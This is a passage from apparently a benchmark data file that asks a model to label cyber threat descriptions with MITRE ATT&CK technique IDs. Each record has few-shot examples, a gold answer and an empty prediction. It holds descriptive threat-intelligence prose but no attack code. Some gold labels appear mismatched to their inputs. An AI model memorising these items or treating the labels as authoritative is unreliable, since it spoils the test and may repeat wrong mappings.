and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KGH_SPY can exfiltrate collected information from the host to the C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back Base64 encoded response\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Zebrocy has exfiltrated data to the designated C2 server using HTTP POST requests.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoshC2 contains a module for taking packet captures on compromised hosts.\n\t - T1040: Network Sniffing\n- Text: From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under \u201cOvercoming network segmentation\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n- Text: Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Regin appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.", + "gold": "- T1040: Network Sniffing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rising Sun can detect the username of the infected host.\n\t - T1033: System Owner/User Discovery\n- Text: can retrieve information about the Windows domain.\n\t - T1016: System Network Configuration Discovery\n- Text: PLEAD has the ability to list open windows on the compromised host.\n\t - T1010: Application Window Discovery\n", + "input": "Lokibot has the ability to discover the username on the infected host.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Command execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim\u2019s device\n\t - T1059: Command and Scripting Interpreter\n- Text: Ke3chang has performed frequent and scheduled data collection from victim networks.\n\t - T1119: Automated Collection\n- Text: If nothing like that is detected, the malware will decrypt the third stage and execute it by using the process hollowing technique, commonly used by malware authors. In this version, the payloads are encrypted with the same XOR-based algorithm as the one used in previous versions, however in this latest version, the payload is encrypted twice, with different keys\n\t - T1027: Obfuscated Files or Information\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", + "input": "FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results.", + "gold": "- T1059: Command and Scripting Interpreter\n- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between \"5.0\" and \"(Windows\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: POWERTON has used AES for encrypting C2 traffic.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: BADCALL uses a FakeTLS method during C2.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n", + "input": "Seasalt uses HTTP for C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) User must open the Microsoft Word email attachment 2) User must scroll to page three of the document, which will run the DealersChoice Flash object 3) The Flash object must contact an active C2 server to download an additional Flash object containing exploit code 4) The initial Flash object must contact the same C2 server to download a secondary payload 5) Victim host must have a vulnerable version of Flash installed\n\t - T1203: Exploitation for Client Execution\n- Text: To exploit the Log4j vulnerability (CVE-2021-44228), the attackers chose one of the publicly available open-source JNDI Exploit Kits, since removed from GitHub due to its enormous popularity following the vulnerability emergence. There are multiple analysis papers that explain how the vulnerability can be exploited, so we will skip the details of the actual exploitation step\n\t - T1190: Exploit Public-Facing Application\n- Text: Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.\n\t - T1068: Exploitation for Privilege Escalation\n", + "input": "Cobalt Group had exploited multiple vulnerabilities for execution, including Microsoft\u2019s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, CVE-2017-0199, and CVE-2017-8759.", + "gold": "- T1203: Exploitation for Client Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The switch statement checks for 19 cases, between 101 and 119. (Updated to correct command IDs, thanks @mykill!) Command ID Function Description 101 getInfoOSX Gathers username and OSX version and responds using the encrypted form of the following string: \u201cMac OS X \u2013 [OSX version] x64
\\nUser name \u2013 [username]\u201d 102 getProcessList Runs \u201cps aux\u201d to obtain a list of running processes 103 remoteShell Runs supplied command using \u201c/bin/sh\u201d 104 getInstalledAPP Gets a list of installed applications by running the command \u201cls -la /Applications\u201d 105 showBackupIosFolder Checks to see if an IOS device was backed up to the system by running the command \u201cls -la ~/Library/Application\\ Support/MobileSync/Backup/\u201d 106 downloadFileFromPath Uploads a file from a specified path 107 createFileInSystem Downloads a file, specifically provided within the C2 server\u2019s HTTP response 108 execFile Executes a specified file on the system using the NSTask:launch method 109 deletFileFromPath Deletes a specified file using the NSFileManager:removeFileAtPath method 110 takeScreenShot Takes a screenshot using the CGGetActiveDisplayList, CGDisplayCreateImage, NSImage:initWithCGImage methods\n\t - T1070.006: Indicator Removal - Timestomp\n\t - T1071: Application Layer Protocol\n\t - T1106: Native API\n- Text: Once on a victim\u2019s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory. It then passes the config buffer to the extracted DLL and calls the exported function (Shellex\n\t - T1129: Shared Modules\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "Lokibot has used LoadLibrary(), GetProcAddress() and CreateRemoteThread() API functions to execute its shellcode.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Volexity has identified multiple new attack campaigns being launched by OceanLotus via multiple fake websites and Facebook pages that have been set up within the last year. In addition to targeting those within Vietnam, Volexity has seen renewed targeting of OceanLotus's neighbors throughout Southeast Asia. These websites have been observed profiling users, redirecting to phishing pages, and being leveraged to distribute malware payloads for Windows and OSX. This post will focus on one of the larger campaigns where OceanLotus has leveraged multiple fake news websites to target users\n\t - T1585.001: Establish Accounts - Social Media Accounts\n- Text: EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.\n\t - T1593.001: Search Open Websites/Domains - Social Media\n- Text: Using spear-phishing emails that contained malicious Amazon-themed documents, the group targeted an employee of an aerospace company in the Netherlands and a political journalist in Belgium.\n\t - T1566.003: Phishing - Spearphishing via Service\n", + "input": "EXOTIC LILY has established social media profiles to mimic employees of targeted companies.", + "gold": "- T1585.001: Establish Accounts - Social Media Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: enumerates the current network connections similar to net use .\n\t - T1049: System Network Connections Discovery\n- Text: is a simple proxy that creates an outbound RDP connection.\n\t - T1090: Proxy\n", + "input": "HARDRAIN uses cmd.exe to execute \"netsh\"commands.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ShimRat has installed shim databases in the \"AppPatch\" folder.\n\t - T1546.011: Event Triggered Execution - Application Shimming\n- Text: If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry \u201cimage file execution options\u201d method\n\t - T1546.012: Event Triggered Execution - Image File Execution Options Injection\n- Text: KEYMARBLE has a command to create Registry entries for storing data under \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath\".\n\t - T1112: Modify Registry\n", + "input": "SDBbot has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description \u201cWindows Check AV\u201d in an apparent attempt to masquerade as a legitimate service.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "APT29 used \"scheduler\" and \"schtasks\" to create new tasks on remote hosts as part of lateral movement. They have manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration. APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted during the 2020 SolarWinds intrusion. They previously used named and hijacked scheduled tasks to also establish persistence.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mitigation Security and system/IT administrators must practice due diligence in protecting their websites and web-based applications from threats that can undermine their security, and hijack them to do the bad guys\u2019 bidding\u2014delivering malware to their victims\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: SslMM identifies and kills anti-malware processes.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: QakBot has the ability to check running processes.\n\t - T1057: Process Discovery\n", + "input": "YAHOYAH checks for antimalware solution processes on the system.", + "gold": "- T1518.001: Software Discovery - Security Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GrimAgent can use an AES key to encrypt C2 communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.\n\t - T1001: Data Obfuscation\n", + "input": "RedLeaves has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chinese state-sponsored cyber actors were observed using the 7- Zip utility to unzip imported tools and malware files onto the victim device.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Molerats has delivered compressed executables within ZIP files to victims.\n\t - T1027: Obfuscated Files or Information\n- Text: During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "VERMIN decrypts code, strings, and commands to use once it's on the victim's machine.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution\n\t - T1041: Exfiltration Over C2 Channel\n- Text: WindTail has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.\n\t - T1008: Fallback Channels\n", + "input": "Carberp has exfiltrated data via HTTP to already established C2 servers.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).\n\t - T1003: OS Credential Dumping\n- Text: As shown in Figure 11, after compromising an initial victim's system (patient 0), the threat actors use the Baidu search engine to search for the victim's organization name. They then identify the Exchange server and attempt to install the OwaAuth web shell. If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail, the adversaries identify other externally accessible servers and deploy ChinaChopper web shells. Within six hours of entering the environment, the threat actors compromised multiple systems and stole credentials for the entire domain\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Koadic can gather hashed passwords by dumping SAM/SECURITY hive.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", + "input": "Axiom has been known to dump credentials.", + "gold": "- T1003: OS Credential Dumping", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: Linfo creates a backdoor through which remote attackers can start a remote shell.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Small Sieve can use Python scripts to execute commands.\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "Turian has the ability to use \"/bin/sh\" to execute commands.", + "gold": "- T1059.004: Command and Scripting Interpreter - Unix Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BADCALL uses a FakeTLS method during C2.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: TrailBlazer has used random identifier strings to obscure its C2 operations and result codes.\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: SideTwist can embed C2 responses in the source code of a fake Flickr webpage.\n\t - T1001: Data Obfuscation\n", + "input": "BLACKCOFFEE has also obfuscated its C2 traffic as normal traffic to sites such as Github.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Small Sieve can use Python scripts to execute commands.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.\n\t - T1046: Network Service Discovery\n- Text: PoetRAT has executed a Lua script through a Lua interpreter for Windows.\n\t - T1059: Command and Scripting Interpreter\n", + "input": "Earth Lusca used Python scripts for port scanning or building reverse shells.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware encrypts user files, demanding a fee of either $300 or $600 worth of bitcoins to an address specified in the instructions displayed after infection\n\t - T1486: Data Encrypted for Impact\n- Text: Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.\n\t - T1564.006: Hide Artifacts - Run Virtual Instance\n- Text: Cadelspy has the ability to steal information about printers and the documents sent to printers.\n\t - T1120: Peripheral Device Discovery\n", + "input": "Ragnar Locker encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: STARWHALE can collect data from an infected local host.\n\t - T1005: Data from Local System\n- Text: The information gathered is added to a string in the following structure: |||||||<\u201chybrid\u201d mode flag from config>|| The payload will base64 encode this string and use its DNS tunneling protocol to transmit the data to the C2\n\t - T1033: System Owner/User Discovery\n\t - T1016: System Network Configuration Discovery\n- Text: Figure 13: Zyklon issuing \u201csettings\u201d command and subsequent server response Figure 14: Zyklon issuing \u201csign\u201d command and subsequent server response Figure 15: Zyklon issuing \u201cddos\u201d command and subsequent server response Plugin Manager Zyklon downloads number of plugins from its C2 server\n\t - T1016: System Network Configuration Discovery\n\t - T1105: Ingress Tool Transfer\n", + "input": "OutSteel can collect information from a compromised host.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Creating malicious Word documents by injecting a remote template URL 2) Hosting a C2 server to gather credentials entered into authentication dialog boxes displayed when attempting to obtain the remote template\n\t - T1221: Template Injection\n- Text: As seen in Figure 2, the VBA code builds the email body and attaches the malicious document to the email. We\u2019ve seen both .docx and .lnk files being used as attachments. These are very similar to the content of the malicious attachments used in Gamaredon\u2019s initial spearphishing campaigns. Figure 3 shows an email generated by this malicious component\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Confucius has used a weaponized Microsoft Word document with an embedded RTF exploit.", + "gold": "- T1221: Template Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hildegard has disguised itself as a known Linux process.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: To establish persistence, Okrum can install itself as a new service named NtmSsvc.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Heyoka Backdoor can check if it is running as a service on a compromised host.\n\t - T1007: System Service Discovery\n", + "input": "Some Volgmer variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.\n\t - T1135: Network Share Discovery\n- Text: accesses network share(s), enables share access to the target device, and copies an executable payload to the target system, and uses a to execute the malware.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Sowbug extracted Word documents from a file server on a victim network.\n\t - T1039: Data from Network Shared Drive\n", + "input": "Diavol has a `ENMDSKS` command to enumerates available network shares.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: No matching sample found for T1562.003\n- Text: The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information. The tool runs the following list of WMI queries\n\t - T1047: Windows Management Instrumentation\n", + "input": "SILENTTRINITY can use PowerShell to execute commands.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kinsing was run through a deployed Ubuntu 